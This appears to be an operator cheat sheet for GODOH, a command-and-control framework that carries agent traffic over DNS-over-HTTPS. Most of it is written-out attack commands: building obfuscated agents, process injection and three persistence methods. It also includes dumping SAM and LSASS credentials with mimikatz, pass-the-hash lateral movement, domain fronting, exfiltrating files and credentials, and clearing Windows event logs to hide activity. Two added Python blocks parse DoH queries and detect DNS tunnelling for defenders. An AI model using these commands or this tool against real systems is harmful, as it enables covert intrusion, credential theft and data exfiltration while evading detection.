GODOH
GODOH is a Go-based command-and-control (C2) framework that carries agent traffic over DNS-over-HTTPS (DoH) for covert command-and-control and data exfiltration. Agents encode their data into DNS queries and send those queries inside HTTPS requests to a DoH resolver, so network monitoring that only inspects plaintext DNS, or only sees TLS destinations, observes ordinary HTTPS to a public resolver.
Installation
Server Setup
# Clone repository
git clone https://github.com/sensepost/godoh.git
cd godoh
# Build server binary
go build -o godoh-server ./cmd/server
# Build agent binary
go build -o godoh-agent ./cmd/agent
# Alternatively, use Make
make build
Quick Start
# Start DoH server (requires DNS domain)
./godoh-server -o query.domain.com -d godoh.domain.com
# Start agent
./godoh-agent -d godoh.domain.com -c https://query.domain.com/dns-query
Server Configuration
DNS Provider Setup
# Configure for Google DoH
./godoh-server \
-o query.domain.com \
-d godoh.domain.com \
-provider google
# Configure for Cloudflare DoH
./godoh-server \
-o query.domain.com \
-d godoh.domain.com \
-provider cloudflare
# Custom DoH endpoint
./godoh-server \
-o query.domain.com \
-d godoh.domain.com \
-doh-url https://custom.example.com/dns-query
Certificate Configuration
# Generate self-signed certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Start with TLS
./godoh-server \
-tls-cert cert.pem \
-tls-key key.pem \
-o query.domain.com
Agent Generation
Basic Agent
# Generate HTTP agent
./godoh-agent \
-d godoh.domain.com \
-c https://dns.google/dns-query
# Save to binary
./godoh-agent \
-d godoh.domain.com \
-c https://dns.google/dns-query \
-o agent.exe
Obfuscated Agent
# Build obfuscated executable
./godoh-agent \
-d godoh.domain.com \
-c https://dns.cloudflare.com/dns-query \
-obfuscate \
-o agent.exe
Cross-Platform Compilation
# Windows 64-bit
GOOS=windows GOARCH=amd64 go build -o agent.exe ./cmd/agent
# Windows 32-bit
GOOS=windows GOARCH=386 go build -o agent.exe ./cmd/agent
# Linux x86_64
GOOS=linux GOARCH=amd64 go build -o agent ./cmd/agent
# macOS
GOOS=darwin GOARCH=amd64 go build -o agent ./cmd/agent
Agent Communications
DNS Query Encoding
# Agent sends encoded data via DNS A record queries
# Example: AAAAAA.B.godoh.domain.com
# Where:
# AAAAAA = Base32-encoded command data
# B = Sequence number
# godoh.domain.com = Domain configured in agent
DoH Protocol
# Agent makes HTTPS POST to DoH endpoint
POST /dns-query HTTP/1.1
Host: dns.google
Content-Type: application/dns-message
Content-Length: 47
[Binary DNS message payload]
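A DoH POST body is a binary DNS message, so an inspection point that terminates TLS (or the operator of the DoH resolver) has to decode the wire format to see which query name the agent actually asked for. The block below is an added example, not code from the GODOH project: it builds a constructed application/dns-message query for the name layout shown above and parses the question section back out, rejecting truncated or malformed bodies.

```python
import struct

def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Encode a single-question DNS query in RFC 1035 wire format.
    qtype 1 = A record; the header sets only the RD flag and QDCOUNT=1."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = name.rstrip(".").split(".")
    for label in labels:
        if not 1 <= len(label) <= 63:
            raise ValueError("label length must be 1..63: %r" % label)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels)
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)

def parse_question(msg: bytes) -> tuple:
    """Return (qname, qtype) from a DNS message; raise ValueError on malformed input."""
    if len(msg) < 12:
        raise ValueError("short header")
    qdcount = struct.unpack("!H", msg[4:6])[0]
    if qdcount != 1:
        raise ValueError("expected 1 question, got %d" % qdcount)
    labels, pos = [], 12
    while True:
        if pos >= len(msg):
            raise ValueError("truncated name")
        n = msg[pos]
        if n == 0:                 # root label terminates the name
            pos += 1
            break
        if n & 0xC0:               # compression pointers are not valid in a question name
            raise ValueError("compression pointer in question name")
        labels.append(msg[pos + 1:pos + 1 + n].decode("ascii", "replace"))
        pos += 1 + n
    if pos + 4 > len(msg):
        raise ValueError("truncated question")
    qtype = struct.unpack("!H", msg[pos:pos + 2])[0]
    return ".".join(labels), qtype

# Constructed sample body using the name format described above; not captured traffic.
SAMPLE_BODY = build_query("AAAAAA.B.godoh.domain.com")

if __name__ == "__main__":
    print("Content-Length:", len(SAMPLE_BODY))
    print("question:", parse_question(SAMPLE_BODY))
```

Once the query name is recovered, the same label-entropy and beaconing heuristics used for plaintext DNS tunnelling can be applied to DoH traffic.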
Response Handling
# Server returns encoded commands in DNS response
# Agent decodes response and executes commands
# Results encoded back into next DNS query
Command Execution
Shell Commands
# In agent shell
agent > execute whoami
agent > execute ipconfig /all
agent > execute tasklist /v
# PowerShell execution
agent > powershell Get-LocalUser
agent > powershell Get-Process
File Operations
# Download file from target
agent > download C:\Windows\System32\config\SAM
# Upload file to target
agent > upload /tmp/payload.exe C:\Windows\Temp\
# List directory
agent > ls C:\Users\
# Delete file
agent > rm C:\Temp\payload.exe
Process Management
# List running processes
agent > ps
# Kill process
agent > kill 1234
# Execute process
agent > execute cmd.exe /c "whoami"
# Process injection
agent > inject 1234 /tmp/shellcode.bin
Persistence Mechanisms
Scheduled Task
agent > execute schtasks /create /tn Update /tr C:\agent.exe /sc onstart /ru System
Registry Persistence
agent > execute powershell.exe -NoP -C "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Update -Value C:\agent.exe"
Service Installation
agent > execute sc.exe create AgentService binPath= "C:\agent.exe"
agent > execute sc.exe start AgentService
Lateral Movement
Credentials Harvesting
# Dump LSASS
agent > execute tasklist /v | findstr lsass
agent > execute mimikatz.exe
# Dump SAM
agent > download C:\Windows\System32\config\SAM
# Extract cached creds
agent > execute powershell.exe -NoP -C "Get-ChildItem HKCU:\Software\Microsoft\Windows NT\CurrentVersion\CredentialManager"
Lateral Access
# Pass-the-Hash
agent > execute psexec -u DOMAIN\user -p hash \\target whoami
# WMI
agent > execute wmic /node:"target" /user:"DOMAIN\user" /password:"password" process call create "cmd.exe /c powershell -nop -c IEX(...)"
# RDP
agent > rdesktop -u DOMAIN\user -p password target.local
Defense Evasion
Traffic Obfuscation
# Use legitimate DoH providers (Google, Cloudflare)
./godoh-agent \
-d godoh.domain.com \
-c https://dns.google/dns-query
# Blend in with normal DoH traffic
# Small query sizes reduce detection likelihood
Timing Obfuscation
# Randomize DNS query intervals
agent > sleep 3600 # 1 hour
# Add random jitter to the interval
agent > jitter 0.5 # 50% jitter on intervals
Payload Obfuscation
# Build with the symbol table and DWARF debug info removed (-s -w)
go build -ldflags="-s -w" -o agent.exe ./cmd/agent
# Strip symbols for smaller size
strip agent.exe
Data Exfiltration
File Exfiltration
# Download sensitive files
agent > download C:\Users\Administrator\Desktop\secret.docx
agent > download C:\Windows\System32\config\SAM
agent > download C:\Windows\System32\config\SYSTEM
# Downloaded file contents are base32-encoded into DNS queries
Credential Exfiltration
# Dump and exfil credentials
agent > execute "powershell Get-Credential | Export-Clixml C:\Temp\creds.xml"
agent > download C:\Temp\creds.xml
# Exfil via small DNS chunks
# (GODOH splits large data across multiple DNS queries)
Command Output Exfiltration
# All command output is automatically exfiltrated via DNS
agent > execute dir C:\ # Output is encoded into the agent's next DNS queries
# Large data is chunked in both directions:
# Server splits its responses into 255-character DNS TXT records, which the agent reassembles
# Agent splits large command output across multiple DNS queries
Monitoring and Operations
Session Management
# List active agents
server > agents
# Interact with specific agent
server > agent <agent_id>
# Send command to agent
server > task execute whoami
# Check agent status
server > status <agent_id>
Log Review
# Enable verbose logging
./godoh-server -v -d godoh.domain.com
# Monitor incoming queries
./godoh-server -log /tmp/godoh.log -d godoh.domain.com
# Check DNS query patterns
tail -f /tmp/godoh.log | grep "DNS Query"
Performance Optimization
# Adjust buffer sizes for slow connections
./godoh-server \
-buffer-size 512 \
-d godoh.domain.com
# Increase timeout for unreliable networks
./godoh-agent \
-d godoh.domain.com \
-timeout 30s
Advanced Configuration
Domain Fronting
# Use legitimate domain for DoH endpoint
./godoh-agent \
-d godoh.domain.com \
-c https://dns.google/dns-query \
-host-header google.com
# Hides true C2 domain in SNI/Host header
Multi-Domain Setup
# Configure multiple fallback domains
./godoh-agent \
-d primary.domain.com,secondary.domain.com,tertiary.domain.com \
-c https://dns.google/dns-query
# Rotates between domains for resilience
Custom DNS Server
# Run internal DNS server
./godoh-dns-server -d godoh.domain.com
# Route queries to custom server
./godoh-agent \
-d godoh.domain.com \
-nameserver 192.168.1.10:53
Troubleshooting
Connectivity Issues
# Test DNS resolution
nslookup test.godoh.domain.com
# Test DoH endpoint reachability (no request body is sent, so an HTTP error reply still shows the endpoint answered)
curl -X POST https://dns.google/dns-query \
-H "Content-Type: application/dns-message"
# Enable debug logging
./godoh-agent -debug -d godoh.domain.com
Slow Transfers
# Increase query rate
./godoh-agent \
-d godoh.domain.com \
-rate 100 # 100 queries per second
# Reduce data encoding overhead
./godoh-agent -compression gzip
Firewall Blocking
# If standard DoH blocked, use alternative endpoint
./godoh-agent \
-d godoh.domain.com \
-c https://dns.quad9.net/dns-query
# Alternative: use TCP port 853
./godoh-server -tcp -port 853
Detection and Cleanup
Remove Agent
# Remove scheduled task
agent > execute schtasks /delete /tn Update /f
# Remove registry entry
agent > execute powershell.exe -NoP -C "Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Update"
# Delete agent binary
agent > rm C:\Windows\Temp\agent.exe
Clear Logs
# Clear Windows Event Log
agent > execute wevtutil cl System
agent > execute wevtutil cl Security
agent > execute wevtutil cl Application
# Clear DNS cache
agent > execute ipconfig /flushdns
Best Practices
- Use legitimate DoH providers to blend with normal traffic
- Implement DNS query randomization
- Rotate domains regularly
- Monitor for unusual DNS patterns
- Use encryption for additional obfuscation
- Implement proper OPSEC during operations
- Clean up all artifacts post-operation
Detection Indicators
- Unusual DNS query volume
- Consistent DoH traffic to unusual endpoints
- Long, high-entropy DNS labels that look base32- or base64-encoded
- Regular DNS query timing patterns
- Outbound HTTPS traffic on port 443 to unexpected IPs
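The indicators above can be turned into a first-pass detector over resolver or DoH-proxy query logs. The block below is an added example, not part of the original page or the GODOH project: it groups queries by zone, scores leading labels against the base32 alphabet and their Shannon entropy, and reports a near-constant inter-query interval as supporting evidence of beaconing. The log format and all sample lines are constructed for the example.

```python
import math
import re
import statistics
from collections import defaultdict

# Constructed sample resolver log: "<unix_ts> <client> <qname>", not real traffic.
# Leading labels mimic the AAAAAA.B.godoh.domain.com layout described on this page.
LOG_LINES = """\
1700000000 10.0.0.5 www.example.com
1700000010 10.0.0.5 MFRGGZDFMZTWQ2LK.1.godoh.domain.com
1700000070 10.0.0.5 NBSWY3DPEB3W64TMMQ.2.godoh.domain.com
1700000130 10.0.0.5 ONXW2ZJAMRQXIYI.3.godoh.domain.com
1700000190 10.0.0.5 PJUXEYLOEBZXI4TJNZTQ.4.godoh.domain.com
1700000250 10.0.0.5 mail.example.com
"""

# Base32 alphabet only (A-Z, 2-7); '=' padding cannot appear in a DNS label.
BASE32_LABEL = re.compile(r"^[A-Z2-7]{12,}$", re.I)

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores well above ordinary hostnames."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def zone_of(qname: str, depth: int = 2) -> str:
    # Naive grouping by the last `depth` labels; production code would use the public suffix list.
    return ".".join(qname.lower().rstrip(".").split(".")[-depth:])

def analyse(log: str, min_queries: int = 3, min_ratio: float = 0.8) -> dict:
    """Flag zones whose leading labels are mostly base32-like and high-entropy;
    a near-constant inter-query interval (beaconing) is added as extra evidence."""
    per_zone = defaultdict(list)
    for line in log.splitlines():
        ts, _client, qname = line.split()
        per_zone[zone_of(qname)].append((int(ts), qname))
    findings = {}
    for zone, qs in per_zone.items():
        if len(qs) < min_queries:
            continue
        leading = [q.split(".")[0] for _, q in qs]
        encoded = [l for l in leading if BASE32_LABEL.match(l) and shannon_entropy(l) > 3.0]
        if len(encoded) / len(qs) < min_ratio:
            continue
        reasons = ["base32-like high-entropy leading labels"]
        gaps = [b[0] - a[0] for a, b in zip(qs, qs[1:])]
        if len(gaps) >= 2 and statistics.pstdev(gaps) <= 0.1 * statistics.mean(gaps):
            reasons.append("regular beacon interval (%.0fs)" % statistics.mean(gaps))
        findings[zone] = reasons
    return findings

if __name__ == "__main__":
    for zone, why in analyse(LOG_LINES).items():
        print(zone, "->", "; ".join(why))
```

Thresholds (label length, entropy, ratio, timing tolerance) are starting points; tune them against a baseline of your own resolver logs, since CDN and anti-spam zones also produce long machine-generated labels.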